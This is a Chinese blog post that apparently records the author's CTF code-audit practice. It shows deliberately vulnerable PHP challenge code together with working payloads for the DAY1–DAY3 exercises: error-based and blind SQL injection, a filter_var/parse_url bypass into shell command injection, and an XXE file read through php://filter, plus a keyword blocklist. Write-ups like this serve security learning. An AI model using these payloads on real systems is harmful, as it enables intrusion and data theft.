<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">



<title>代码审计慢慢学-01 | Love to share</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    


</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Bentham&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Bentham&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div id="post-toc" class="post-toc">
            <span class="post-toc-title">catalogue</span>
            <div class="post-toc-content">
                <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY1–in-array-绕过和不能使用拼接函数的-updatexml-注入"><span class="toc-text">DAY1–in_array() 绕过和不能使用拼接函数的 updatexml 注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY2–-filter-var-函数的绕过与远程命令执行"><span class="toc-text">DAY2– filter_var()函数的绕过与远程命令执行</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#定义和用法"><span class="toc-text">定义和用法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#语法"><span class="toc-text">语法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#定义和用法-1"><span class="toc-text">定义和用法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY3–实例化漏洞与XXE漏洞（Globlterator类与SimpleXMLElement）"><span class="toc-text">DAY3–实例化漏洞与XXE漏洞（Globlterator类与SimpleXMLElement）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY4"><span class="toc-text">DAY4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY5–escapeshellarg和escapeshellcmd联合使用导致多参数注入"><span class="toc-text">DAY5–escapeshellarg和escapeshellcmd联合使用导致多参数注入</span></a></li></ol><li class="toc-item toc-level-1"><a class="toc-link" href="#escapeshellarg"><span class="toc-text">escapeshellarg</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#说明"><span class="toc-text">说明</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#escapeshellcmd"><span class="toc-text">escapeshellcmd</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#说明-1"><span class="toc-text">说明</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY6–不严格的正则匹配以及弱类型比较问题"><span class="toc-text">DAY6–不严格的正则匹配以及弱类型比较问题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DYA7–pares-str-变量覆盖和文件上传条件竞争问题"><span class="toc-text">DYA7–pares_str()变量覆盖和文件上传条件竞争问题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY8–无字母符号getshell"><span class="toc-text">DAY8–无字母符号getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY9–变量覆盖导致的waf绕过"><span class="toc-text">DAY9–变量覆盖导致的waf绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY10–程序未及时停止导致的问题"><span class="toc-text">DAY10–程序未及时停止导致的问题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY11"><span class="toc-text">DAY11</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DAY12–反斜杠导致单引号注入和REQUEST引起的waf绕过"><span class="toc-text">DAY12–反斜杠导致单引号注入和REQUEST引起的waf绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-text">总结</span></a></li>
            </div>
        </div>
    
    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">代码审计慢慢学-01</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">zhhhy</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">November 9, 2018&nbsp;&nbsp;15:50:58</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <section class="post-content">
            <p>红日安全出的代码审计项目。。。之前审计<code>苹果CMS</code>复现不成功十分郁闷，于是先从里面的CTF进行练习吧。</p>
<p>看官方出的题解。。作为菜鸡很难理解，每一道复现的都很艰难，也的确学习到很多知识。</p>
<a id="more"></a>

<h2 id="DAY1–in-array-绕过和不能使用拼接函数的-updatexml-注入"><a href="#DAY1–in-array-绕过和不能使用拼接函数的-updatexml-注入" class="headerlink" title="DAY1–in_array() 绕过和不能使用拼接函数的 updatexml 注入"></a>DAY1–in_array() 绕过和不能使用拼接函数的 <strong>updatexml</strong> 注入</h2><p>题目源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">'config.php'</span>;</span><br><span class="line">$conn = <span class="keyword">new</span> mysqli($servername, $username, $password, $dbname);</span><br><span class="line"><span class="keyword">if</span> ($conn-&gt;connect_error) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"连接失败: "</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$sql = <span class="string">"SELECT COUNT(*) FROM users"</span>;</span><br><span class="line">$whitelist = <span class="keyword">array</span>();</span><br><span class="line">$result = $conn-&gt;query($sql);</span><br><span class="line"><span class="keyword">if</span>($result-&gt;num_rows &gt; <span class="number">0</span>)&#123;</span><br><span class="line">    $row = $result-&gt;fetch_assoc();</span><br><span class="line">    $whitelist = range(<span class="number">1</span>, $row[<span class="string">'COUNT(*)'</span>]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$id = stop_hack($_GET[<span class="string">'id'</span>]);</span><br><span class="line">$sql = <span class="string">"SELECT * FROM users WHERE id=$id"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!in_array($id, $whitelist)) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"id $id is not in whitelist."</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$result = $conn-&gt;query($sql);</span><br><span class="line"><span class="keyword">if</span>($result-&gt;num_rows &gt; <span class="number">0</span>)&#123;</span><br><span class="line">    $row = $result-&gt;fetch_assoc();</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;center&gt;&lt;table border='1'&gt;"</span>;</span><br><span class="line">    <span class="keyword">foreach</span> ($row <span class="keyword">as</span> $key =&gt; $value) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;tr&gt;&lt;td&gt;&lt;center&gt;$key&lt;/center&gt;&lt;/td&gt;&lt;br&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;td&gt;&lt;center&gt;$value&lt;/center&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br&gt;"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;/table&gt;&lt;/center&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>($conn-&gt;error);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line">$servername = <span class="string">"localhost"</span>;</span><br><span class="line">$username = <span class="string">"fire"</span>;</span><br><span class="line">$password = <span class="string">"fire"</span>;</span><br><span class="line">$dbname = <span class="string">"day1"</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">stop_hack</span><span class="params">($value)</span></span>&#123;</span><br><span class="line">	$pattern = <span class="string">"insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval"</span>;</span><br><span class="line">	$back_list = explode(<span class="string">"|"</span>,$pattern);</span><br><span class="line">	<span class="keyword">foreach</span>($back_list <span class="keyword">as</span> $hack)&#123;</span><br><span class="line">		<span class="keyword">if</span>(preg_match(<span class="string">"/$hack/i"</span>, $value))</span><br><span class="line">			<span class="keyword">die</span>(<span class="string">"$hack detected!"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> $value;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>这题的问题关键点在于 <code>in_array</code> 绕过</strong><br>首先，我们得先绕过<code>in_array函数</code>。流程是将数据库里的所有的<code>id</code>值取出存在<code>$whitelist</code>中
然后，判断传入的<code>id</code>是否存在白名单里。也就是说，其实<code>id</code>必须是数字。如果不是数字就会报错。</p>
<p>关于<code>in_array()</code>函数</p>
<blockquote>
<p><strong>in_array</strong> ](<a href="http://php.net/manual/zh/function.in-array.php)：" target="_blank" rel="noopener">http://php.net/manual/zh/function.in-array.php)：</a>(PHP 4, PHP 5, PHP 7)</p>
<p><strong>功能</strong> ：检查数组中是否存在某个值</p>
<p><strong>定义</strong> ： bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) </p>
<p>在 <strong>$haystack</strong> 中搜索 <strong>$needle</strong> ，如果第三个参数 <strong>$strict</strong> 的值为 <strong>TRUE</strong> ，则 <strong>in_array()</strong> 函数会进行强检查，检查 <strong>$needle</strong> 的类型是否和 <strong>$haystack</strong> 中的相同。如果找到 <strong>$haystack</strong> ，则返回 <strong>TRUE</strong>，否则返回 <strong>FALSE</strong>。</p>
</blockquote>
<p>所以关键点在于第三个参数，并没有指定为<code>true</code>导致比较的时候并没有进行<code>类型比较</code>，而由于PHP的弱类型，<code>1=1a</code>是成立的.做一个测试</p>
<p><code>test.php</code>代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?PHP</span></span><br><span class="line">$id=<span class="string">"1 and 1=if(length(database())&gt;100,1,0)"</span>;</span><br><span class="line">$whitelist = range(<span class="number">1</span>,<span class="number">233</span>);</span><br><span class="line"><span class="keyword">if</span>(in_array($id, $whitelist))&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"true"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>得到回显</p>
<p><img src="php-study-1/1.png" alt><br>这样即便输入的不是数字。也不会<code>die</code>从而给出正确的回显。这里可以利用盲注，可是由于<code>stop_hack</code>将<code>or</code>过滤了导致<code>information_schema.tables</code>也无法通过正则，没想出很好的绕过方法。但是，在尝试绕过的时候发现它将报错信息回显了！</p>
<p><img src="php-study-1/2.png" alt><br>随即产生的一个思路就是报错注入。<a href="https://zhhhy.github.io/2018/09/26/sqli/" target="_blank" rel="noopener">https://zhhhy.github.io/2018/09/26/sqli/</a><br>在之前的博客里翻了翻没有一条payload能满足这次注入的需求，果然还是积累太少。</p>
<p><strong>红日安全团队给的官方答案如下：</strong></p>
<p>学习一波<code>updatexml</code>注入的<code>payload</code></p>
<p>常见的报错<code>payload</code>的如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)  //0x7e 等于 ~</span><br></pre></td></tr></table></figure>

<blockquote>
<p>当 <strong>updatexml</strong> 中存在特殊字符或字母时，会出现报错，报错信息为特殊字符、字母及之后的内容，也就是说如果我们想要查询的数据是数字开头，例如 <strong>7701HongRi</strong> ，那么查询结果只会显示 <strong>HongRi</strong> </p>
</blockquote>
<p>由于拼接函数被过滤了，于是变形<code>payload</code>如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and (select updatexml(1,make_set(3,&apos;~&apos;,(select flag from flag)),1))</span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/3.png" alt></p>
<p>当然，这一切都是知道表名和列名的前提，一时间想不到如何绕过对<code>or</code>这个的处理。假设我们知道表名列名，那么就可以利用盲注来获取数据。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">1</span> <span class="keyword">and</span> <span class="keyword">if</span>(length((select flag from flag))&gt;<span class="number">1</span>,<span class="number">1</span>,<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/4.png" alt></p>
<p><a href="https://xz.aliyun.com/t/2160" target="_blank" rel="noopener">参考资料</a></p>
<h2 id="DAY2–-filter-var-函数的绕过与远程命令执行"><a href="#DAY2–-filter-var-函数的绕过与远程命令执行" class="headerlink" title="DAY2– filter_var()函数的绕过与远程命令执行"></a>DAY2– <strong>filter_var()</strong>函数的绕过与远程命令执行</h2><p>题目源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">$url = $_GET[<span class="string">'url'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($url) &amp;&amp; filter_var($url, FILTER_VALIDATE_URL))&#123;</span><br><span class="line">    $site_info = parse_url($url);</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">'/sec-redclub.com$/'</span>,$site_info[<span class="string">'host'</span>]))&#123;</span><br><span class="line">        exec(<span class="string">'curl "'</span>.$site_info[<span class="string">'host'</span>].<span class="string">'"'</span>, $result);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;center&gt;&lt;h1&gt;You have curl &#123;$site_info['host']&#125; successfully!&lt;/h1&gt;&lt;/center&gt;</span></span><br><span class="line"><span class="string">              &lt;center&gt;&lt;textarea rows='20' cols='90'&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> implode(<span class="string">' '</span>, $result);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"&lt;center&gt;&lt;h1&gt;Error: Host not allowed&lt;/h1&gt;&lt;/center&gt;"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;center&gt;&lt;h1&gt;Just curl sec-redclub.com!&lt;/h1&gt;&lt;/center&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">          &lt;center&gt;&lt;h3&gt;For example:?url=http://sec-redclub.com&lt;/h3&gt;&lt;/center&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>关于<code>filter_var()</code>函数的介绍</p>
<blockquote>
<h2 id="定义和用法"><a href="#定义和用法" class="headerlink" title="定义和用法"></a>定义和用法</h2><p>filter_var() 函数通过指定的过滤器过滤变量。</p>
<p>如果成功，则返回已过滤的数据，如果失败，则返回 false。</p>
<h3 id="语法"><a href="#语法" class="headerlink" title="语法"></a>语法</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; filter_var(variable, filter, options)</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>variable</td>
<td>必需。规定要过滤的变量。</td>
</tr>
<tr>
<td>filter</td>
<td>可选。规定要使用的过滤器的 ID。</td>
</tr>
<tr>
<td>options</td>
<td>规定包含标志/选项的数组。检查每个过滤器可能的标志和选项。</td>
</tr>
</tbody></table>
</blockquote>
<p>题目里<code>filter_var($url, FILTER_VALIDATE_URL)</code>过滤器参数为<code>FILTER_VALIDATE_URL</code>,看看这个过滤器是啥玩意</p>
<blockquote>
<h2 id="定义和用法-1"><a href="#定义和用法-1" class="headerlink" title="定义和用法"></a>定义和用法</h2><p>FILTER_VALIDATE_URL 过滤器把值作为 URL 进行验证。</p>
<ul>
<li>Name: “validate_url”</li>
<li>ID-number: 273</li>
</ul>
<p>可能的标志：</p>
<ul>
<li>FILTER_FLAG_SCHEME_REQUIRED - 要求 URL 是 RFC 兼容 URL。（比如：<a href="http://example）" target="_blank" rel="noopener">http://example）</a></li>
<li>FILTER_FLAG_HOST_REQUIRED - 要求 URL 包含主机名（<a href="http://www.example.com）" target="_blank" rel="noopener">http://www.example.com）</a></li>
<li>FILTER_FLAG_PATH_REQUIRED - 要求 URL 在主机名后存在路径（比如：eg.com/example1/）</li>
<li>FILTER_FLAG_QUERY_REQUIRED - 要求 URL 存在查询字符串（比如：”eg.php?age=37”）</li>
</ul>
</blockquote>
<p>简单的理解中这个过滤器就是用来判断传入的<code>url</code>是否有效合法的。</p>
<p>先来绕过 <strong>filter_var</strong> 的 <strong>FILTER_VALIDATE_URL</strong> 过滤器，贴上<code>红日安全团队给的payload</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost/index.php?url=http://demo.com@sec-redclub.com</span></span><br><span class="line">http:<span class="comment">//localhost/index.php?url=http://demo.com&amp;sec-redclub.com</span></span><br><span class="line">http:<span class="comment">//localhost/index.php?url=http://demo.com?sec-redclub.com</span></span><br><span class="line">http:<span class="comment">//localhost/index.php?url=http://demo.com/sec-redclub.com</span></span><br><span class="line">http:<span class="comment">//localhost/index.php?url=demo://demo.com,sec-redclub.com</span></span><br><span class="line">http:<span class="comment">//localhost/index.php?url=demo://demo.com:80;sec-redclub.com:80/</span></span><br><span class="line">http:<span class="comment">//localhost/index.php?url=http://demo.com#sec-redclub.com</span></span><br><span class="line">PS:最后一个payload的<span class="comment">#符号，请换成对应的url编码 %23</span></span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/5.png" alt></p>
<p>接着要绕过 <strong>parse_url</strong> 函数，并且满足 <strong>$site_info[‘host’]</strong> 的值以 <strong>sec-redclub.com</strong> 结尾，这部分没有复现成功，大概是我用的是<code>windows</code>环境，红日安全应该用的是<code>linux</code>吧.payload如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost/index.php?url=demo://%22;ls;%23;sec-redclub.com:80/</span></span><br></pre></td></tr></table></figure>

<p>输出看看<code>parse_url</code>解析后的结果</p>
<p><img src="php-study-1/6.png" alt></p>
<p>成功解析成满足正则的<code>host</code>。这里猜测<code>；</code>之类的是为了<code>exce</code>函数正常执行。</p>
<p>接下来,得到路径读取<code>flag</code></p>
<blockquote>
<p>当我们直接用 <strong>cat f1agi3hEre.php</strong> 命令的时候，过不了 <strong>filter_var</strong> 函数检测，因为包含空格，具体payload如下：</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost/index.php?url=demo://%22;cat%20f1agi3hEre.php;%23;sec-redclub.com:80/</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>当我们直接用 <strong>cat f1agi3hEre.php</strong> 命令的时候，过不了 <strong>filter_var</strong> 函数检测，因为包含空格</p>
</blockquote>
<blockquote>
<p>所以我们可以换成 <strong>cat&lt;f1agi3hEre.php</strong> 命令，即可成功获取flag</p>
</blockquote>
<p><img src="php-study-1/7.png" alt="1541647952280"></p>
<p>这边虽然没有直接读到<code>flag</code>，但是可以用另一种方式证明系统调用我们注入的命令了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/day2/index.php?url=demo://%22;echo&gt;aaaa.txt;%23;sec-redclub.com:80/</span></span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/8.png" alt="1541650041703"></p>
<p>在目录下生成了一个输出了一个<code>aaaa.txt</code>。算是另一种复现成功了吧。</p>
<p>关于<code>SSRF</code>的知识点，还是没办法理解透彻，归根结底，对<code>协议</code>，<code>php语言</code>不够熟悉。慢慢积累吧，道阻且长！</p>
<p>参考资料：<a href="https://www.anquanke.com/post/id/101058" target="_blank" rel="noopener">SSRF技巧之如何绕过filter_var( )</a> </p>
<p>​          <a href="http://www.freebuf.com/articles/web/137923.html" target="_blank" rel="noopener">浅谈CTF中命令执行与绕过的小技巧</a> </p>
<h2 id="DAY3–实例化漏洞与XXE漏洞（Globlterator类与SimpleXMLElement）"><a href="#DAY3–实例化漏洞与XXE漏洞（Globlterator类与SimpleXMLElement）" class="headerlink" title="DAY3–实例化漏洞与XXE漏洞（Globlterator类与SimpleXMLElement）"></a>DAY3–实例化漏洞与XXE漏洞（Globlterator类与SimpleXMLElement）</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">NotFound</span></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'404'</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">spl_autoload_register(</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="params">($class)</span></span>&#123;</span><br><span class="line">		<span class="keyword">new</span> NotFound();</span><br><span class="line">	&#125;</span><br><span class="line">);</span><br><span class="line">$classname = <span class="keyword">isset</span>($_GET[<span class="string">'name'</span>]) ? $_GET[<span class="string">'name'</span>] : <span class="keyword">null</span>;</span><br><span class="line">$param = <span class="keyword">isset</span>($_GET[<span class="string">'param'</span>]) ? $_GET[<span class="string">'param'</span>] : <span class="keyword">null</span>;</span><br><span class="line">$param2 = <span class="keyword">isset</span>($_GET[<span class="string">'param2'</span>]) ? $_GET[<span class="string">'param2'</span>] : <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(class_exists($classname))&#123;</span><br><span class="line">	$newclass = <span class="keyword">new</span> $classname($param,$param2);</span><br><span class="line">	var_dump($newclass);</span><br><span class="line">    <span class="keyword">foreach</span> ($newclass <span class="keyword">as</span> $key=&gt;$value)</span><br><span class="line">        <span class="keyword">echo</span> $key.<span class="string">'=&gt;'</span>.$value.<span class="string">'&lt;br&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先，我们有三个参数可控，在之后的<code>if</code>判断了是否存在这个类名是否存在。我们假如输入一个不存在的类名，就如图返回`404</p>
<p><img src="php-study-1/14.png" alt="1541680384471"></p>
<p>这时候就需要利用PHP的内置类，先用 <strong>GlobIterator</strong> 类搜索 <strong>flag文件</strong> 名字</p>
<p>关于<strong>Globlterator</strong></p>
<blockquote>
<p>public <strong>GlobIterator::__construct</strong> ( string <code>$pattern</code> [, int <code>$flags</code> = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )</p>
</blockquote>
<p>第一个参数为要搜索的文件名，第二个参数为选择文件的哪个信息作为键名，这里我选择用 <strong>FilesystemIterator::CURRENT_AS_FILEINFO</strong> ，其对应的常量值为0，你可以在 <a href="http://php.net/manual/en/globiterator.construct.php" target="_blank" rel="noopener">这里</a> 找到这些常量的值，所以最终搜索文件的 <strong>payload</strong> 如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost/CTF/index.php?name=GlobIterator&amp;param=./*.php&amp;param2=0</span></span><br></pre></td></tr></table></figure>

<p>注意的是。。由于红日安全每篇都没有告知环境，这里踩了不少坑。。在<code>PHP5</code>中使用这个<code>payload</code>失败，返回的结果非常奇怪，并且路径关系搞不清。更换版本成<code>php7</code>就成功了。</p>
<p><img src="php-study-1/111.png" alt="1541683509132"></p>
<p>发现<code>flag.php</code>，再使用<code>内置类SimpleXMLElement</code>读取<code>flag.php</code>文件的内容。这里贴上<code>红日安全</code>的<code>payload</code></p>
<blockquote>
<p>这里我们要结合使用PHP流的使用，因为当文件中存在： <strong>&lt;   &gt;   &amp;   ‘   “</strong> 这5个符号时，会导致XML文件解析错误，所以我们这里利用PHP文件流，将要读取的文件内容经过 <strong>base64编码</strong> 后输出即可</p>
</blockquote>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/CTF/index.php?name=SimpleXMLElement&amp;param=<span class="meta">&lt;?xml version="1.0"?&gt;</span><span class="meta">&lt;!DOCTYPE ANY [&lt;!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/CTF/flag.php"&gt;]&gt;</span><span class="tag">&lt;<span class="name">x</span>&gt;</span>%26xxe;<span class="tag">&lt;/<span class="name">x</span>&gt;</span>&amp;param2=2</span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/112.png" alt="1541684423585"></p>
<p>利用<code>base64</code>解码以后就可以读取到flag了。成功复现开心~</p>
<h2 id="DAY4"><a href="#DAY4" class="headerlink" title="DAY4"></a>DAY4</h2><p>环境没有搭建成功。放着以后玩</p>
